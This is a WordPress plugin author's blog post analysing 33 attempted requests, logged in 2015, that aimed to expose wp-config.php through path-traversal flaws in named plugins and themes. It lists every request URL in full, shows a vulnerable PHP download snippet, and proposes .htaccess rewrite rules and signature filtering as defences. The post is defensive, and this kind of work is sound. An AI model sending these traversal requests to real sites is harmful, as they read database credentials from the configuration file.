Prevent exposure of wp-config.php

From July to September in 2015, 33 types of malicious requests to attempt exposing the wp-config.php via vulnerable plugins and themes had been observed on my site. I analyzed all of them to identify if IP Location Block can block them or not.

Unfortunately, I could not find all the causes of exposure because most of them were already removed from the WordPress repository. So I can’t say the right thing with confidence, but only 2 of these could be blocked by IP Location Block 0.2.1.5 and under even if they were from the forbidden countries.

In this article, I should clarify how to prevent exposure of wp-config.php against such malicious requests.

Analysis of Attack Vectors

Before showing the results, I should explain the description of the terms same as in the previous article.

Attack Vector = Type x Path

where:

  • Type: The type of vulnerability that an attacker can abuse. For example, XSS, SQLI, LFI, and so on. Also, it includes certain parameters which are generally called “signature”.
  • Path: The path to the entrance into WordPress where an attacker can deliver a certain type of vulnerability.

The “Path” can be categorized into below:

Abbreviation of Path Description
WP It loads WordPress Core through wp-load.php.
PD It is called Plugin Directly without loading WP Core.
N/A Unknown because the source code is Not Available.

Here’s the table of 33 requests that were attempted to expose wp-config.php in my site. Most of them were disclosed recently.

IP Location Block 0.2.1.5 and under can only protect the Path of WP, while the PD (and probably N/A) can not because those plugins and themes never load the WordPress core.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Type Path Disclosed Request
AFD PD 2015-08-10 /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=../../../../wp-config.php
RFD PD 2015-07-16 /wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=../../../../wp-config.php
AFD PD 2015-07-12 /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../wp-config.php
AFD PD 2015-07-09 /wp-content/plugins/ibs-mappro/lib/download.php?file=../../../../wp-config.php
RFD PD 2015-07-05 /wp-content/plugins/image-export/download.php?file=../../../wp-config.php
AFD PD 2015-07-05 /wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php
RFD WP 2015-07-05 /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php
RFD WP 2015-07-02 /wp-content/plugins/wp-swimteam/include/user/download.php?file=../../../../../wp-config.php&filename=../../../../../wp-config.php&contenttype=text/html&transient=1&abspath=/usr/share/wordpress
AFD PD 2015-06-10 /wp-content/plugins/history-collection/download.php?var=../../../wp-config.php
AFD N/A 2015-04-18 /wp-content/plugins/wp-moN/Assets/download.php?type=octet/stream&path=../../../../&name=wp-config.php
RFD N/A 2015-04-13 /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
AFD PD 2015-03-26 /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php
LFD N/A 2015-02-16 /wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php
AFD N/A 2014-12-24 /wp-content/themes/markant/download.php?file=../../wp-config.php
AFD N/A 2014-12-24 /wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php
AFD N/A 2014-12-24 /wp-content/themes/felis/download.php?file=../wp-config.php
AFD N/A 2014-12-24 /wp-content/themes/SMWF/inc/download.php?file=../wp-config.php
AFD N/A 2014-12-24 /wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
AFD N/A 2014-12-24 /wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php
AFD N/A 2014-12-24 /wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
AFD N/A 2014-12-24 /wp-content/themes/yakimabait/download.php?file=./wp-config.php
LFI N/A 2014-12-07 /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
AFD N/A 2014-12-06 /wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php
AFD PD 2014-09-09 /wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=../../../../../wp-config.php
AFD N/A 2014-09-08 /wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php
AFD N/A 2014-09-08 /wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
AFD N/A 2014-09-07 /wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
AFD N/A 2014-09-07 /wp-content/themes/epic/includes/download.php?file=wp-config.php
LFI N/A 2014-09-03 /wp-admiN/Admin-ajax.php?action=revslider_show_image&img=../wp-config.php
LFI N/A 2014-04-14 /wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php
AFD N/A 2014-08-31 /wp-content/themes/lote27/download.php?download=../../../wp-config.php
AFD PD 2014-08-01 /wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php
RFD N/A 2011-09-19 /wp-content/plugins/filedownload/download.php?path=../../../wp-config.php&type=aplication/pdf

What’s the cause?

As you can see, most of them had their own download function like download.php. Typical OMG emoji code in there are like this:

<?php
$file = $_GET['file'];
if (file_exists('../../uploads/xxxx/'.$file)) {
    readfile('../../uploads/xxxx/'.$file);
    exit();
}
?>

This kind of vulnerability is caused by Directory Traversal attack.

I’m not sure why some authers tend to such a direct requesting without loading WordPress core (do they mind speed?), but they should know why so many WordPress plugins vulnerable and absolutely use some of WordPress framework unless they can’t keep their products secure by their own.

How to protect my site against such OMG code?

First and foremost, we should consider to make the Path transformed from PD and N/A to WP. If those plugins and themes would load WordPres core before they were excuted, IP Location Block can have a chance to block the attacks.

So we should force those plugins and themes to load the wp-load.php. To
achieve this, .htaccess in the plugins directory can be configured to
rewrite a request to rewrite.php by following directives:

# BEGIN IP Location Block
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteBase /wp-content/plugins/ip-location-block/
RewriteCond %{REQUEST_URI} !ip-location-block/rewrite.php$
RewriteRule ^.*.php$ rewrite.php [L]
</IfModule>
# END IP Location Block

The absolute path /wp-content/plugins/ should be changed according to your site configuration. And here’s the example of .htaccess in the themes directory:

# BEGIN IP Location Block
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteBase /wp-content/plugins/ip-location-block/
RewriteRule ^.*.php$ rewrite.php [L]
</IfModule>
# END IP Location Block

Those will redirect a request, which is pointed to /wp-content/plugins/.../*.php and to /wp-content/themes/.../*.php, to the rewrite.php in IP Location Block to load wp-load.php and then it will be validated by country code or WP-ZEP emoji.

Another consideration for Type in Attack Vector is that IP Location Block should filter out the “Malicious signature” such as wp-config.php or passwd  to defence against attacks from the permitted countries.

I’ll provide you this functionarity in the next release (may be 0.2.2.0) !!

emoji

Leave a Comment

Your email address will not be published. Required fields are marked *